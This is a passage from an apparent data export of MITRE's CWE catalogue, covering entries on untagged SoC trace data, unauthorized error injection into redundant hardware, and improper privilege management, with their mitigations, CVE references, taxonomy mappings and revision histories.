"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "284",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
}
] | null | null |
[
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "In a SoC, traces generated from sources include security-sensitive IP blocks such as CPU (with tracing information such as instructions executed and memory operands), on-chip fabric (e.g., memory-transfer signals, transaction type and destination, and on-chip-firewall-error signals), power-management IP blocks (e.g., clock- and power-gating signals), and cryptographic coprocessors (e.g., cryptographic keys and intermediate values of crypto operations), among other non-security-sensitive IP blocks including timers and other functional blocks. The collected traces are then forwarded to the debug and trace interface used by the external hardware debugger.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "The traces do not have any privilege level attached to them. All collected traces can be viewed by any debugger (i.e., SoC designer, OEM debugger, or end user).",
"IntroText": null,
"Language": "Other",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "Some of the traces are SoC-design-house secrets, while some are OEM secrets. Few are end-user secrets and the rest are not security-sensitive. Tag all traces with the appropriate, privilege level at the source. The bits indicating the privilege level must be immutable in their transit from trace source to the final, trace sink. Debugger privilege level must be checked before providing access to traces.",
"IntroText": null,
"Language": "Other",
"Nature": "Good",
"Reference": null
}
],
"ID": null
}
] | null | null | null | null | 1
|
[
[
"284",
"1323"
]
] |
[] |
1334
|
Unauthorized Error Injection Can Degrade Hardware Redundancy
|
Base
|
Simple
|
Draft
|
An unauthorized agent can inject errors into a redundant block to deprive the system of redundancy or put the system in a degraded operating mode.
|
To ensure the performance and functional reliability of certain components, hardware designers can implement hardware blocks for redundancy in the case that others fail. This redundant block can be prevented from performing as intended if the design allows unauthorized agents to inject errors into it. In this way, a path with injected errors may become unavailable to serve as a redundant channel. This may put the system into a degraded mode of operation which could be exploited by a subsequent attack.
|
[
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
},
{
"Class": "Not OS-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Operating_System"
},
{
"Class": "Not Architecture-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Architecture"
},
{
"Class": "Not Technology-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Technology"
}
] | null |
[
{
"Note": "Such issues could be introduced during hardware architecture and design and identified later during Testing or System Configuration phases.",
"Phase": "Architecture and Design"
},
{
"Note": "Such issues could be introduced during implementation and identified later during Testing or System Configuration phases.",
"Phase": "Implementation"
},
{
"Note": "Such issues could be introduced during integration and identified later during Testing or System Configuration phases.",
"Phase": "Integration"
}
] |
[
{
"Impact": [
"DoS: Crash, Exit, or Restart",
"DoS: Instability",
"Quality Degradation",
"DoS: Resource Consumption (CPU)",
"DoS: Resource Consumption (Memory)",
"DoS: Resource Consumption (Other)",
"Reduce Performance",
"Reduce Reliability",
"Unexpected State"
],
"Likelihood": null,
"Note": null,
"Scope": [
"Integrity",
"Availability"
]
}
] |
[
{
"Description": "Ensure the design does not allow error injection in modes intended for normal run-time operation. Provide access controls on interfaces for injecting errors.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Architecture and Design"
],
"Strategy": null
},
{
"Description": "Disallow error injection in modes which are expected to be used for normal run-time operation. Provide access controls on interfaces for injecting errors.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Implementation"
],
"Strategy": null
},
{
"Description": "Add an access control layer atop any unprotected interfaces for injecting errors.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Integration"
],
"Strategy": null
}
] | null | null | null |
[
"624",
"625"
] | null | null |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2020-07-29",
"SubmissionName": "James Pangburn",
"SubmissionOrganization": "Accellera IP Security Assurance (IPSA) Working Group",
"SubmissionReleaseDate": "2020-12-10",
"SubmissionVersion": "4.3",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Related_Attack_Patterns",
"ModificationDate": "2023-01-31",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "284",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
}
] | null | null | null | null | null | null | null | 1
|
[
[
"284",
"1334"
]
] |
[] |
269
|
Improper Privilege Management
|
Class
|
Simple
|
Draft
|
The product does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor.
| null |
[
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
}
] | null |
[
{
"Note": null,
"Phase": "Architecture and Design"
},
{
"Note": "REALIZATION: This weakness is caused during implementation of an architectural security tactic.",
"Phase": "Implementation"
},
{
"Note": null,
"Phase": "Operation"
}
] |
[
{
"Impact": [
"Gain Privileges or Assume Identity"
],
"Likelihood": null,
"Note": null,
"Scope": [
"Access Control"
]
}
] |
[
{
"Description": "Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": "MIT-1",
"Phase": [
"Architecture and Design",
"Operation"
],
"Strategy": null
},
{
"Description": "Follow the principle of least privilege when assigning access rights to entities in a software system.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": "MIT-48",
"Phase": [
"Architecture and Design"
],
"Strategy": "Separation of Privilege"
},
{
"Description": "Consider following the principle of separation of privilege. Require multiple conditions to be met before permitting access to a system resource.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": "MIT-49",
"Phase": [
"Architecture and Design"
],
"Strategy": "Separation of Privilege"
}
] |
[
{
"Description": "Terminal privileges are not reset when a user logs out.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2001-1555",
"Reference": "CVE-2001-1555"
},
{
"Description": "Does not properly pass security context to child processes in certain cases, allows privilege escalation.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2001-1514",
"Reference": "CVE-2001-1514"
},
{
"Description": "Does not properly compute roles.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2001-0128",
"Reference": "CVE-2001-0128"
},
{
"Description": "untrusted user placed in unix \"wheel\" group",
"Link": "https://www.cve.org/CVERecord?id=CVE-1999-1193",
"Reference": "CVE-1999-1193"
},
{
"Description": "Product allows users to grant themselves certain rights that can be used to escalate privileges.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2005-2741",
"Reference": "CVE-2005-2741"
},
{
"Description": "Product uses group ID of a user instead of the group, causing it to run with different privileges. This is resultant from some other unknown issue.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2005-2496",
"Reference": "CVE-2005-2496"
},
{
"Description": "Product mistakenly assigns a particular status to an entity, leading to increased privileges.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2004-0274",
"Reference": "CVE-2004-0274"
},
{
"Description": "FTP client program on a certain OS runs with setuid privileges and has a buffer overflow. Most clients do not need extra privileges, so an overflow is not a vulnerability for those clients.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2007-4217",
"Reference": "CVE-2007-4217"
},
{
"Description": "OS incorrectly installs a program with setuid privileges, allowing users to gain privileges.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2007-5159",
"Reference": "CVE-2007-5159"
},
{
"Description": "Composite: application running with high privileges (CWE-250) allows user to specify a restricted file to process, which generates a parsing error that leaks the contents of the file (CWE-209).",
"Link": "https://www.cve.org/CVERecord?id=CVE-2008-4638",
"Reference": "CVE-2008-4638"
},
{
"Description": "Installation script installs some programs as setuid when they shouldn't be.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2007-3931",
"Reference": "CVE-2007-3931"
},
{
"Description": "Roles have access to dangerous procedures (Accessible entities).",
"Link": "https://www.cve.org/CVERecord?id=CVE-2002-1981",
"Reference": "CVE-2002-1981"
},
{
"Description": "Untrusted object/method gets access to clipboard (Accessible entities).",
"Link": "https://www.cve.org/CVERecord?id=CVE-2002-1671",
"Reference": "CVE-2002-1671"
},
{
"Description": "Traceroute program allows unprivileged users to modify source address of packet (Accessible entities).",
"Link": "https://www.cve.org/CVERecord?id=CVE-2000-0315",
"Reference": "CVE-2000-0315"
},
{
"Description": "User with capability can prevent setuid program from dropping privileges (Unsafe privileged actions).",
"Link": "https://www.cve.org/CVERecord?id=CVE-2000-0506",
"Reference": "CVE-2000-0506"
}
] | null |
[
{
"EntryID": null,
"EntryName": "Privilege Management Error",
"MappingFit": null,
"TaxonomyName": "PLOVER"
},
{
"EntryID": "Part 2-4",
"EntryName": "Req SP.03.08 BR",
"MappingFit": null,
"TaxonomyName": "ISA/IEC 62443"
},
{
"EntryID": "Part 3-2",
"EntryName": "Req CR 3.1",
"MappingFit": null,
"TaxonomyName": "ISA/IEC 62443"
},
{
"EntryID": "Part 3-3",
"EntryName": "Req SR 1.2",
"MappingFit": null,
"TaxonomyName": "ISA/IEC 62443"
},
{
"EntryID": "Part 3-3",
"EntryName": "Req SR 2.1",
"MappingFit": null,
"TaxonomyName": "ISA/IEC 62443"
},
{
"EntryID": "Part 4-1",
"EntryName": "Req SD-3",
"MappingFit": null,
"TaxonomyName": "ISA/IEC 62443"
},
{
"EntryID": "Part 4-1",
"EntryName": "Req SD-4",
"MappingFit": null,
"TaxonomyName": "ISA/IEC 62443"
},
{
"EntryID": "Part 4-1",
"EntryName": "Req SI-1",
"MappingFit": null,
"TaxonomyName": "ISA/IEC 62443"
},
{
"EntryID": "Part 4-2",
"EntryName": "Req CR 1.1",
"MappingFit": null,
"TaxonomyName": "ISA/IEC 62443"
},
{
"EntryID": "Part 4-2",
"EntryName": "Req CR 2.1",
"MappingFit": null,
"TaxonomyName": "ISA/IEC 62443"
}
] |
[
"122",
"233",
"58"
] |
[
{
"Authors": [
"Michael Howard",
"David LeBlanc",
"John Viega"
],
"Edition": null,
"ExternalReferenceID": "REF-44",
"Publication": "McGraw-Hill",
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": "2010",
"Publisher": null,
"Section": "\"Sin 16: Executing Code With Too Much Privilege.\" Page 243",
"Title": "24 Deadly Sins of Software Security",
"URL": null,
"URLDate": null
},
{
"Authors": [
"Mark Dowd",
"John McDonald",
"Justin Schuh"
],
"Edition": "1st Edition",
"ExternalReferenceID": "REF-62",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": "2006",
"Publisher": "Addison Wesley",
"Section": "Chapter 9, \"Dropping Privileges Permanently\", Page 479",
"Title": "The Art of Software Security Assessment",
"URL": null,
"URLDate": null
},
{
"Authors": [
"MITRE"
],
"Edition": null,
"ExternalReferenceID": "REF-1287",
"Publication": null,
"PublicationDay": "28",
"PublicationMonth": "06",
"PublicationYear": "2022",
"Publisher": null,
"Section": "Details of Problematic Mappings",
"Title": "Supplemental Details - 2022 CWE Top 25",
"URL": "https://cwe.mitre.org/top25/archive/2022/2022_cwe_top25_supplemental.html#problematicMappingDetails",
"URLDate": "2024-11-17"
}
] |
[
{
"Note": "The relationships between privileges, permissions, and actors (e.g. users and groups) need further refinement within the Research view. One complication is that these concepts apply to two different pillars, related to control of resources (CWE-664) and protection mechanism failures (CWE-693).",
"Type": "Maintenance"
}
] |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2006-07-19",
"SubmissionName": "PLOVER",
"SubmissionOrganization": null,
"SubmissionReleaseDate": "2006-07-19",
"SubmissionVersion": "Draft 3",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Time_of_Introduction",
"ModificationDate": "2008-07-01",
"ModificationName": "Eric Dalci",
"ModificationOrganization": "Cigital",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "Moved this entry higher up in the Research view.",
"ModificationDate": "2008-09-08",
"ModificationName": null,
"ModificationOrganization": "CWE Team",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description, Maintenance_Notes, Name, Relationships, Taxonomy_Mappings, Weakness_Ordinalities",
"ModificationDate": "2008-09-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Name",
"ModificationDate": "2009-05-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations",
"ModificationDate": "2009-12-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations",
"ModificationDate": "2010-06-21",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description, Relationships",
"ModificationDate": "2011-03-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences",
"ModificationDate": "2011-06-01",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated References, Relationships",
"ModificationDate": "2012-05-11",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations",
"ModificationDate": "2012-10-30",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations",
"ModificationDate": "2013-02-21",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms, Causal_Nature, Modes_of_Introduction, Relationships, Type",
"ModificationDate": "2017-11-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Related_Attack_Patterns, Relationships",
"ModificationDate": "2019-06-20",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples, Maintenance_Notes, Observed_Examples, Relationships",
"ModificationDate": "2019-09-19",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Observed_Examples, Relationships",
"ModificationDate": "2020-02-24",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2020-08-20",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples",
"ModificationDate": "2021-03-15",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2021-10-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2022-04-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated References",
"ModificationDate": "2022-10-13",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description",
"ModificationDate": "2023-01-31",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Detection_Factors, Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes, Relationships, Taxonomy_Mappings",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Diagram",
"ModificationDate": "2024-07-16",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": "2024-07-16",
"ModificationVersion": "4.15",
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
